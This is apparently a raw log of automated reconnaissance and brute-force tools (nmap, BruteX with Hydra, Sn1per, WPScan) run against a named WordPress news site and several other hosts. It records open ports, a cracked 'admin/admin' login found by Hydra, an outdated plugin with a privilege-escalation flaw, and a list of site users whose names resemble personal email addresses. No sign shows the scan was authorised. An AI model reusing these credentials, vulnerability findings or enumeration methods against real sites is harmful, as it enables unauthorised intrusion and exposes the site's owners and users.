- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 128 bits AES128-SHA
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: *.wpengine.com
- Altnames: DNS:*.wpengine.com, DNS:wpengine.com
- Issuer: RapidSSL RSA CA 2018
- Not valid before: Feb 1 00:00:00 2018 GMT
- Not valid after: Jul 20 12:00:00 2019 GMT
- #######################################################################################################################################
- I, [2018-11-08T00:32:26.695775 #7041] INFO -- : Initiating port scan
- I, [2018-11-08T00:33:29.958426 #7041] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-08_00-32-26.xml
- I, [2018-11-08T00:33:29.959370 #7041] INFO -- : Discovered open port: 104.196.67.80:80
- I, [2018-11-08T00:33:30.895001 #7041] INFO -- : Discovered open port: 104.196.67.80:443
- I, [2018-11-08T00:33:32.610571 #7041] INFO -- : <<<Enumerating vulnerable applications>>>
- --------------------------------------------------------
- <<<Yasuo discovered following vulnerable applications>>>
- --------------------------------------------------------
- +----------+--------------------+-------------------+----------+----------+
- | App Name | URL to Application | Potential Exploit | Username | Password |
- +----------+--------------------+-------------------+----------+----------+
- +----------+--------------------+-------------------+----------+----------+
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:36 EST
- NSE: Loaded 148 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 00:36
- Completed NSE at 00:36, 0.00s elapsed
- Initiating NSE at 00:36
- Completed NSE at 00:36, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 00:36
- Completed Parallel DNS resolution of 1 host. at 00:36, 16.50s elapsed
- Initiating SYN Stealth Scan at 00:36
- Scanning theredelephants.com (104.196.67.80) [474 ports]
- Discovered open port 443/tcp on 104.196.67.80
- Discovered open port 80/tcp on 104.196.67.80
- Discovered open port 2222/tcp on 104.196.67.80
- Completed SYN Stealth Scan at 00:36, 6.90s elapsed (474 total ports)
- Initiating Service scan at 00:36
- Scanning 3 services on theredelephants.com (104.196.67.80)
- Completed Service scan at 00:37, 34.01s elapsed (3 services on 1 host)
- Initiating OS detection (try #1) against theredelephants.com (104.196.67.80)
- Retrying OS detection (try #2) against theredelephants.com (104.196.67.80)
- Initiating Traceroute at 00:37
- Completed Traceroute at 00:37, 0.13s elapsed
- Initiating Parallel DNS resolution of 2 hosts. at 00:37
- Completed Parallel DNS resolution of 2 hosts. at 00:37, 16.50s elapsed
- NSE: Script scanning 104.196.67.80.
- Initiating NSE at 00:37
- Completed NSE at 00:37, 9.16s elapsed
- Initiating NSE at 00:37
- Completed NSE at 00:37, 0.00s elapsed
- Nmap scan report for theredelephants.com (104.196.67.80)
- Host is up (0.13s latency).
- Not shown: 468 filtered ports
- PORT STATE SERVICE VERSION
- 25/tcp closed smtp
- 80/tcp open http-proxy Squid http proxy
- |_http-open-proxy: Proxy might be redirecting requests
- |_http-title: 500 Server error
- 139/tcp closed netbios-ssn
- 443/tcp open ssl/http nginx
- |_http-server-header: nginx
- |_http-title: 502 Bad Gateway
- | ssl-cert: Subject: commonName=*.wpengine.com
- | Subject Alternative Name: DNS:*.wpengine.com, DNS:wpengine.com
- | Issuer: commonName=RapidSSL RSA CA 2018/organizationName=DigiCert Inc/countryName=US
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2018-02-01T00:00:00
- | Not valid after: 2019-07-20T12:00:00
- | MD5: 78f7 9fa1 664d 3813 0245 5d39 813d d072
- |_SHA-1: 0707 f8a5 5c34 596e 0f7f 1eab f202 d40d 9f05 05cd
- |_ssl-date: TLS randomness does not represent time
- | tls-alpn:
- | h2
- |_ http/1.1
- | tls-nextprotoneg:
- | h2
- |_ http/1.1
- 445/tcp closed microsoft-ds
- 2222/tcp open ssh ProFTPD mod_sftp 0.9.9 (protocol 2.0)
- Device type: general purpose|storage-misc|broadband router|WAP|phone
- Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (94%), HP embedded (91%), Asus embedded (88%), Google Android 4.X (87%)
- OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel cpe:/h:asus:rt-ac66u cpe:/o:google:android:4.0
- Aggressive OS guesses: Linux 3.16 - 4.6 (94%), Linux 3.10 - 4.11 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 4.2 (92%), Linux 4.4 (92%), Linux 3.18 (91%), HP P2000 G3 NAS device (91%), Linux 3.2 - 4.9 (91%), Linux 3.16 (90%)
- No exact OS matches for host (test conditions non-ideal).
- Uptime guess: 86.627 days (since Mon Aug 13 10:34:48 2018)
- Network Distance: 2 hops
- TCP Sequence Prediction: Difficulty=261 (Good luck!)
- IP ID Sequence Generation: All zeros
- TRACEROUTE (using port 139/tcp)
- HOP RTT ADDRESS
- 1 126.04 ms 10.245.200.1
- 2 125.82 ms 104.196.67.80
- NSE: Script Post-scanning.
- Initiating NSE at 00:37
- Completed NSE at 00:37, 0.00s elapsed
- Initiating NSE at 00:37
- Completed NSE at 00:37, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 89.19 seconds
- Raw packets sent: 1010 (47.860KB) | Rcvd: 630 (111.367KB)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:37 EST
- NSE: Loaded 148 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 00:37
- Completed NSE at 00:37, 0.00s elapsed
- Initiating NSE at 00:37
- Completed NSE at 00:37, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 00:37
- Completed Parallel DNS resolution of 1 host. at 00:38, 16.50s elapsed
- Initiating UDP Scan at 00:38
- Scanning theredelephants.com (104.196.67.80) [14 ports]
- Completed UDP Scan at 00:38, 2.10s elapsed (14 total ports)
- Initiating Service scan at 00:38
- Scanning 12 services on theredelephants.com (104.196.67.80)
- Service scan Timing: About 8.33% done; ETC: 00:57 (0:17:47 remaining)
- Completed Service scan at 00:39, 102.58s elapsed (12 services on 1 host)
- Initiating OS detection (try #1) against theredelephants.com (104.196.67.80)
- Retrying OS detection (try #2) against theredelephants.com (104.196.67.80)
- Initiating Traceroute at 00:39
- Completed Traceroute at 00:40, 7.19s elapsed
- Initiating Parallel DNS resolution of 1 host. at 00:40
- Completed Parallel DNS resolution of 1 host. at 00:40, 16.50s elapsed
- NSE: Script scanning 104.196.67.80.
- Initiating NSE at 00:40
- Completed NSE at 00:40, 20.38s elapsed
- Initiating NSE at 00:40
- Completed NSE at 00:40, 1.03s elapsed
- Nmap scan report for theredelephants.com (104.196.67.80)
- Host is up (0.16s latency).
- PORT STATE SERVICE VERSION
- 53/udp open|filtered domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 137/udp filtered netbios-ns
- 138/udp filtered netbios-dgm
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using port 138/udp)
- HOP RTT ADDRESS
- 1 121.69 ms 10.245.200.1
- 2 ... 3
- 4 117.26 ms 10.245.200.1
- 5 122.86 ms 10.245.200.1
- 6 122.86 ms 10.245.200.1
- 7 122.86 ms 10.245.200.1
- 8 122.86 ms 10.245.200.1
- 9 122.86 ms 10.245.200.1
- 10 122.88 ms 10.245.200.1
- 11 ... 18
- 19 122.05 ms 10.245.200.1
- 20 117.44 ms 10.245.200.1
- 21 ... 27
- 28 117.99 ms 10.245.200.1
- 29 ...
- 30 118.15 ms 10.245.200.1
- NSE: Script Post-scanning.
- Initiating NSE at 00:40
- Completed NSE at 00:40, 0.00s elapsed
- Initiating NSE at 00:40
- Completed NSE at 00:40, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 171.98 seconds
- Raw packets sent: 135 (8.008KB) | Rcvd: 665 (105.041KB)
- #######################################################################################################################################
- __________ __ ____ ___
- \______ \_______ __ ___/ |_ ____ \ \/ /
- | | _/\_ __ \ | \ __\/ __ \ \ /
- | | \ | | \/ | /| | \ ___/ / \
- |______ / |__| |____/ |__| \___ >___/\ \
- \/ \/ \_/
- + -- --=[BruteX v1.7 by 1N3
- + -- --=[http://crowdshield.com
- ################################### Running Port Scan #################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:40 EST
- Nmap scan report for theredelephants.com (104.196.67.80)
- Host is up (0.14s latency).
- Not shown: 21 filtered ports, 3 closed ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 80/tcp open http
- 443/tcp open https
- Nmap done: 1 IP address (1 host up) scanned in 19.24 seconds
- ################################### Running Brute Force ###############################################################################
- + -- --=[Port 21 closed... skipping.
- + -- --=[Port 22 closed... skipping.
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 80 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-08 00:41:02
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking http-get://theredelephants.com:80//
- [80][http-get] host: theredelephants.com login: admin password: admin
- [STATUS] attack finished for theredelephants.com (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-08 00:41:24
- + -- --=[Port 110 closed... skipping.
- + -- --=[Port 139 closed... skipping.
- + -- --=[Port 162 closed... skipping.
- + -- --=[Port 389 closed... skipping.
- + -- --=[Port 443 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-08 00:41:24
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking http-gets://theredelephants.com:443//
- [443][http-get] host: theredelephants.com login: admin password: admin
- [STATUS] attack finished for theredelephants.com (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-08 00:41:44
- + -- --=[Port 445 closed... skipping.
- + -- --=[Port 512 closed... skipping.
- + -- --=[Port 513 closed... skipping.
- + -- --=[Port 514 closed... skipping.
- + -- --=[Port 993 closed... skipping.
- + -- --=[Port 1433 closed... skipping.
- + -- --=[Port 1521 closed... skipping.
- + -- --=[Port 3306 closed... skipping.
- + -- --=[Port 3389 closed... skipping.
- + -- --=[Port 5432 closed... skipping.
- + -- --=[Port 5900 closed... skipping.
- + -- --=[Port 5901 closed... skipping.
- + -- --=[Port 8000 closed... skipping.
- + -- --=[Port 8080 closed... skipping.
- + -- --=[Port 8100 closed... skipping.
- + -- --=[Port 6667 closed... skipping.
- * default
- * default
- [*] Importing 'Nmap XML' data
- [*] Import: Parsing with 'Nokogiri v1.8.5'
- [*] Importing host 104.196.67.80
- [*] Successfully imported /usr/share/sniper/loot/theredelephants.com/nmap/nmap-theredelephants.com.xml
- [*] Importing 'Nmap XML' data
- [*] Import: Parsing with 'Nokogiri v1.8.5'
- [*] Importing host 104.196.67.80
- [*] Successfully imported /usr/share/sniper/loot/theredelephants.com/nmap/nmap-udp-theredelephants.com.xml
- [*] Importing 'Nmap XML' data
- [*] Import: Parsing with 'Nokogiri v1.8.5'
- [*] Importing host 104.196.67.80
- [*] Successfully imported /usr/share/sniper/loot/theredelephants.com/nmap/nmap-theredelephants.com-udp.xml
- Hosts
- =====
- address mac name os_name os_flavor os_sp purpose info comments
- ------- --- ---- ------- --------- ----- ------- ---- --------
- 91.121.2.184 Linux 2.6.X server
- 104.196.67.80 Linux 3.X server
- 195.55.47.89 Windows 3.X device
- Services
- ========
- host port proto name state info
- ---- ---- ----- ---- ----- ----
- 91.121.2.184 22 tcp ssh open OpenSSH 5.3 protocol 2.0
- 91.121.2.184 25 tcp smtp closed
- 91.121.2.184 53 udp domain unknown
- 91.121.2.184 67 udp dhcps unknown
- 91.121.2.184 68 udp dhcpc unknown
- 91.121.2.184 69 udp tftp unknown
- 91.121.2.184 80 tcp http open Apache httpd PHP 5.6.14
- 91.121.2.184 88 udp kerberos-sec unknown
- 91.121.2.184 123 udp ntp unknown
- 91.121.2.184 137 udp netbios-ns filtered
- 91.121.2.184 138 udp netbios-dgm filtered
- 91.121.2.184 139 tcp netbios-ssn closed
- 91.121.2.184 139 udp netbios-ssn unknown
- 91.121.2.184 161 udp snmp unknown
- 91.121.2.184 162 udp snmptrap unknown
- 91.121.2.184 389 tcp ldap open OpenLDAP 2.2.X - 2.3.X
- 91.121.2.184 389 udp ldap unknown
- 91.121.2.184 443 tcp ssl/ssl open Apache httpd SSL-only mode
- 91.121.2.184 445 tcp microsoft-ds closed
- 91.121.2.184 465 tcp ssl/smtps open
- 91.121.2.184 520 udp route unknown
- 91.121.2.184 993 tcp ssl/imaps open
- 91.121.2.184 2049 udp nfs unknown
- 91.121.2.184 7071 tcp ssl/iwg1 open
- 91.121.2.184 8080 tcp ssh open OpenSSH 5.3 protocol 2.0
- 104.196.67.80 25 tcp smtp closed
- 104.196.67.80 53 udp domain unknown
- 104.196.67.80 67 udp dhcps unknown
- 104.196.67.80 68 udp dhcpc unknown
- 104.196.67.80 69 udp tftp unknown
- 104.196.67.80 80 tcp http-proxy open Squid http proxy
- 104.196.67.80 88 udp kerberos-sec unknown
- 104.196.67.80 123 udp ntp unknown
- 104.196.67.80 137 udp netbios-ns filtered
- 104.196.67.80 138 udp netbios-dgm filtered
- 104.196.67.80 139 tcp netbios-ssn closed
- 104.196.67.80 139 udp netbios-ssn unknown
- 104.196.67.80 161 udp snmp unknown
- 104.196.67.80 162 udp snmptrap unknown
- 104.196.67.80 389 udp ldap unknown
- 104.196.67.80 443 tcp ssl/http open nginx
- 104.196.67.80 445 tcp microsoft-ds closed
- 104.196.67.80 520 udp route unknown
- 104.196.67.80 2049 udp nfs unknown
- 104.196.67.80 2222 tcp ssh open ProFTPD mod_sftp 0.9.9 protocol 2.0
- 195.55.47.89 25 tcp smtp closed
- 195.55.47.89 53 udp domain unknown
- 195.55.47.89 67 udp dhcps unknown
- 195.55.47.89 68 udp dhcpc unknown
- 195.55.47.89 69 udp tftp unknown
- 195.55.47.89 80 tcp http-proxy open Squid http proxy
- 195.55.47.89 88 udp kerberos-sec unknown
- 195.55.47.89 113 tcp ident closed
- 195.55.47.89 123 udp ntp unknown
- 195.55.47.89 137 udp netbios-ns filtered
- 195.55.47.89 138 udp netbios-dgm filtered
- 195.55.47.89 139 tcp netbios-ssn closed
- 195.55.47.89 139 udp netbios-ssn unknown
- 195.55.47.89 161 udp snmp unknown
- 195.55.47.89 162 udp snmptrap unknown
- 195.55.47.89 389 udp ldap unknown
- 195.55.47.89 443 tcp https open Microsoft-HTTPAPI/2.0
- 195.55.47.89 445 tcp microsoft-ds closed
- 195.55.47.89 520 udp route unknown
- 195.55.47.89 2049 udp nfs unknown
- #######################################################################################################################################
- [+] URL: http://theredelephants.com/
- [+] Started: Wed Nov 7 23:17:01 2018
- Interesting Finding(s):
- [+] http://theredelephants.com/
- | Interesting Entries:
- | - WPE-Backend: apache
- | - X-Cacheable: SHORT
- | - X-Pass-Why:
- | - X-Cache-Group: normal
- | - X-Type: default
- | Found By: Headers (Passive Detection)
- | Confidence: 100%
- [+] http://theredelephants.com/robots.txt
- | Interesting Entries:
- | - /wp-admin/
- | - /wp-admin/admin-ajax.php
- | Found By: Robots Txt (Aggressive Detection)
- | Confidence: 100%
- [+] http://theredelephants.com/xmlrpc.php
- | Found By: Link Tag (Passive Detection)
- | Confidence: 100%
- | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
- | References:
- | - http://codex.wordpress.org/XML-RPC_Pingback_API
- | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
- | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
- | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
- | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
- [+] This site has 'Must Use Plugins': http://theredelephants.com/wp-content/mu-plugins/
- | Found By: Direct Access (Aggressive Detection)
- | Confidence: 80%
- | Reference: http://codex.wordpress.org/Must_Use_Plugins
- [+] WordPress version 4.9.8 identified (Released on 2018-08-02).
- | Detected By: Rss Generator (Passive Detection)
- | - http://theredelephants.com/feed/, <generator>https://wordpress.org/?v=4.9.8</generator>
- | - http://theredelephants.com/comments/feed/, <generator>https://wordpress.org/?v=4.9.8</generator>
- [+] WordPress theme in use: Newspaper
- | Location: http://theredelephants.com/wp-content/themes/Newspaper/
- | Readme: http://theredelephants.com/wp-content/themes/Newspaper/readme.txt
- | Style URL: http://theredelephants.com/wp-content/themes/Newspaper/style.css?ver=8.1.2
- | Style Name: Newspaper
- | Style URI: http://tagdiv.com
- | Description: Premium wordpress template, clean and easy to use....
- | Author: tagDiv
- | Author URI: http://themeforest.net/user/tagDiv/portfolio
- |
- | Detected By: Css Style (Passive Detection)
- |
- | Version: 8.1.2 (80% confidence)
- | Detected By: Style (Passive Detection)
- | - http://theredelephants.com/wp-content/themes/Newspaper/style.css?ver=8.1.2, Match: 'Version: 8.1.2'
- [+] Enumerating All Plugins
- [+] Checking Plugin Versions
- [i] Plugin(s) Identified:
- [+] contact-form-7
- | Location: http://theredelephants.com/wp-content/plugins/contact-form-7/
- | Last Updated: 2018-10-29T23:58:00.000Z
- | [!] The version is out of date, the latest version is 5.0.5
- |
- | Detected By: Urls In Homepage (Passive Detection)
- |
- | [!] 1 vulnerability identified:
- |
- | [!] Title: Contact Form 7 <= 5.0.3 - register_post_type() Privilege Escalation
- | Fixed in: 5.0.4
- | References:
- | - https://wpvulndb.com/vulnerabilities/9127
- | - https://contactform7.com/2018/09/04/contact-form-7-504/
- | - https://plugins.trac.wordpress.org/changeset/1935726/contact-form-7
- | - https://plugins.trac.wordpress.org/changeset/1934594/contact-form-7
- | - https://plugins.trac.wordpress.org/changeset/1934343/contact-form-7
- | - https://plugins.trac.wordpress.org/changeset/1934327/contact-form-7
- |
- | Version: 4.9.1 (100% confidence)
- | Detected By: Query Parameter (Passive Detection)
- | - http://theredelephants.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.9.1
- | - http://theredelephants.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.9.1
- | Confirmed By:
- | Readme - Stable Tag (Aggressive Detection)
- | - http://theredelephants.com/wp-content/plugins/contact-form-7/readme.txt
- | Readme - ChangeLog Section (Aggressive Detection)
- | - http://theredelephants.com/wp-content/plugins/contact-form-7/readme.txt
- [+] js_composer
- | Location: http://theredelephants.com/wp-content/plugins/js_composer/
- |
- | Detected By: Urls In Homepage (Passive Detection)
- | Confirmed By: Body Tag (Passive Detection)
- |
- | Version: 5.4.2 (70% confidence)
- | Detected By: Query Parameter (Passive Detection)
- | - http://theredelephants.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=5.4.2
- | Confirmed By: Body Tag (Passive Detection)
- | - http://theredelephants.com/, Match: 'js-comp-ver-5.4.2'
- [+] mashsharer
- | Location: http://theredelephants.com/wp-content/plugins/mashsharer/
- | Last Updated: 2018-10-15T11:18:00.000Z
- | [!] The version is out of date, the latest version is 3.5.5
- |
- | Detected By: Urls In Homepage (Passive Detection)
- | Confirmed By:
- | Graph Meta Tags Comment (Passive Detection)
- | Twitter Card Comment (Passive Detection)
- |
- | Version: 3.4.6 (100% confidence)
- | Detected By: Twitter Card Comment (Passive Detection)
- | - http://theredelephants.com/, Match: 'Twitter Card generated by MashShare 3.4.6'
- | Confirmed By:
- | Query Parameter (Passive Detection)
- | - http://theredelephants.com/wp-content/plugins/mashsharer/assets/css/mashsb.min.css?ver=3.4.6
- | - http://theredelephants.com/wp-content/plugins/mashsharer/assets/js/mashsb.min.js?ver=3.4.6
- | Graph Meta Tags Comment (Passive Detection)
- | - http://theredelephants.com/, Match: 'Graph Meta Tags generated by MashShare 3.4.6'
- [+] theia-sticky-sidebar
- | Location: http://theredelephants.com/wp-content/plugins/theia-sticky-sidebar/
- |
- | Detected By: Urls In Homepage (Passive Detection)
- |
- | The version could not be determined.
- [+] vc-post-grid-addon
- | Location: http://theredelephants.com/wp-content/plugins/vc-post-grid-addon/
- |
- | Detected By: Urls In Homepage (Passive Detection)
- |
- | The version could not be determined.
- [+] wordpress-seo
- | Location: http://theredelephants.com/wp-content/plugins/wordpress-seo/
- | Last Updated: 2018-11-06T09:26:00.000Z
- | [!] The version is out of date, the latest version is 9.1
- |
- | Detected By: Comment (Passive Detection)
- |
- | Version: 5.8 (100% confidence)
- | Detected By: Comment (Passive Detection)
- | - http://theredelephants.com/, Match: 'optimized with the Yoast SEO plugin v5.8 -'
- | Confirmed By:
- | Readme - Stable Tag (Aggressive Detection)
- | - http://theredelephants.com/wp-content/plugins/wordpress-seo/readme.txt
- | Readme - ChangeLog Section (Aggressive Detection)
- | - http://theredelephants.com/wp-content/plugins/wordpress-seo/readme.txt
- [+] wp-progression-player
- | Location: http://theredelephants.com/wp-content/plugins/wp-progression-player/
- |
- | Detected By: Urls In Homepage (Passive Detection)
- |
- | Version: 1.0.0 (100% confidence)
- | Detected By: Readme - Stable Tag (Aggressive Detection)
- | - http://theredelephants.com/wp-content/plugins/wp-progression-player/README.txt
- | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
- | - http://theredelephants.com/wp-content/plugins/wp-progression-player/README.txt
- [+] Enumerating Config Backups
- Checking Config Backups - Time: 00:00:05 <===> (21 / 21) 100.00% Time: 00:00:05
- [i] No Config Backups Found.
- [+] Finished: Wed Nov 7 23:17:56 2018
- [+] Requests Done: 73
- [+] Cached Requests: 5
- [+] Data Sent: 17.063 KB
- [+] Data Received: 4.475 MB
- [+] Memory used: 71.684 MB
- [+] Elapsed time: 00:00:55
- #######################################################################################################################################
- [+] URL: http://theredelephants.com/
- [+] Started: Wed Nov 7 23:19:30 2018
- Interesting Finding(s):
- [+] http://theredelephants.com/
- | Interesting Entries:
- | - WPE-Backend: apache
- | - X-Cacheable: SHORT
- | - X-Pass-Why:
- | - X-Cache-Group: normal
- | - X-Type: default
- | Found By: Headers (Passive Detection)
- | Confidence: 100%
- [+] http://theredelephants.com/robots.txt
- | Interesting Entries:
- | - /wp-admin/
- | - /wp-admin/admin-ajax.php
- | Found By: Robots Txt (Aggressive Detection)
- | Confidence: 100%
- [+] http://theredelephants.com/xmlrpc.php
- | Found By: Link Tag (Passive Detection)
- | Confidence: 100%
- | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
- | References:
- | - http://codex.wordpress.org/XML-RPC_Pingback_API
- | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
- | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
- | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
- | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
- [+] This site has 'Must Use Plugins': http://theredelephants.com/wp-content/mu-plugins/
- | Found By: Direct Access (Aggressive Detection)
- | Confidence: 80%
- | Reference: http://codex.wordpress.org/Must_Use_Plugins
- [+] WordPress version 4.9.8 identified (Released on 2018-08-02).
- | Detected By: Rss Generator (Passive Detection)
- | - http://theredelephants.com/feed/, <generator>https://wordpress.org/?v=4.9.8</generator>
- | - http://theredelephants.com/comments/feed/, <generator>https://wordpress.org/?v=4.9.8</generator>
- [+] WordPress theme in use: Newspaper
- | Location: http://theredelephants.com/wp-content/themes/Newspaper/
- | Readme: http://theredelephants.com/wp-content/themes/Newspaper/readme.txt
- | Style URL: http://theredelephants.com/wp-content/themes/Newspaper/style.css?ver=8.1.2
- | Style Name: Newspaper
- | Style URI: http://tagdiv.com
- | Description: Premium wordpress template, clean and easy to use....
- | Author: tagDiv
- | Author URI: http://themeforest.net/user/tagDiv/portfolio
- |
- | Detected By: Css Style (Passive Detection)
- |
- | Version: 8.1.2 (80% confidence)
- | Detected By: Style (Passive Detection)
- | - http://theredelephants.com/wp-content/themes/Newspaper/style.css?ver=8.1.2, Match: 'Version: 8.1.2'
- [+] Enumerating Vulnerable Plugins
- [+] Checking Plugin Versions
- [i] Plugin(s) Identified:
- [+] contact-form-7
- | Location: http://theredelephants.com/wp-content/plugins/contact-form-7/
- | Last Updated: 2018-10-29T23:58:00.000Z
- | [!] The version is out of date, the latest version is 5.0.5
- |
- | Detected By: Urls In Homepage (Passive Detection)
- |
- | [!] 1 vulnerability identified:
- |
- | [!] Title: Contact Form 7 <= 5.0.3 - register_post_type() Privilege Escalation
- | Fixed in: 5.0.4
- | References:
- | - https://wpvulndb.com/vulnerabilities/9127
- | - https://contactform7.com/2018/09/04/contact-form-7-504/
- | - https://plugins.trac.wordpress.org/changeset/1935726/contact-form-7
- | - https://plugins.trac.wordpress.org/changeset/1934594/contact-form-7
- | - https://plugins.trac.wordpress.org/changeset/1934343/contact-form-7
- | - https://plugins.trac.wordpress.org/changeset/1934327/contact-form-7
- |
- | Version: 4.9.1 (100% confidence)
- | Detected By: Query Parameter (Passive Detection)
- | - http://theredelephants.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.9.1
- | - http://theredelephants.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.9.1
- | Confirmed By:
- | Readme - Stable Tag (Aggressive Detection)
- | - http://theredelephants.com/wp-content/plugins/contact-form-7/readme.txt
- | Readme - ChangeLog Section (Aggressive Detection)
- | - http://theredelephants.com/wp-content/plugins/contact-form-7/readme.txt
- [+] Enumerating Vulnerable Themes
- Checking Known Locations - Time: 00:01:37 <> (287 / 287) 100.00% Time: 00:01:37
- [+] Checking Theme Versions
- [i] No themes Found.
- [i] No Timthumbs Found.
- [+] Enumerating Config Backups
- Checking Config Backups - Time: 00:00:04 <===> (21 / 21) 100.00% Time: 00:00:04
- [i] No Config Backups Found.
- [+] Enumerating DB Exports
- Checking DB Exports - Time: 00:00:02 <=======> (36 / 36) 100.00% Time: 00:00:02
- [i] No DB Exports Found.
- [i] No Medias Found.
- [+] Enumerating Users
- Brute Forcing Author IDs - Time: 00:00:02 <==> (10 / 10) 100.00% Time: 00:00:02
- [i] User(s) Identified:
- [+] Austin Rucker
- | Detected By: Rss Generator (Passive Detection)
- | Confirmed By: Rss Generator (Aggressive Detection)
- [+] Vincent James
- | Detected By: Rss Generator (Passive Detection)
- | Confirmed By: Rss Generator (Aggressive Detection)
- [+] amandaleighmossgmail-com
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://theredelephants.com/wp-json/wp/v2/users/
- [+] austinnealruckergmail-com
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://theredelephants.com/wp-json/wp/v2/users/
- [+] chad-corpyahoo-com
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://theredelephants.com/wp-json/wp/v2/users/
- [+] davidschellcomcast-net
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://theredelephants.com/wp-json/wp/v2/users/
- [+] emilyhemingway2gmail-com
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://theredelephants.com/wp-json/wp/v2/users/
- [+] infodynamicdreamz-com
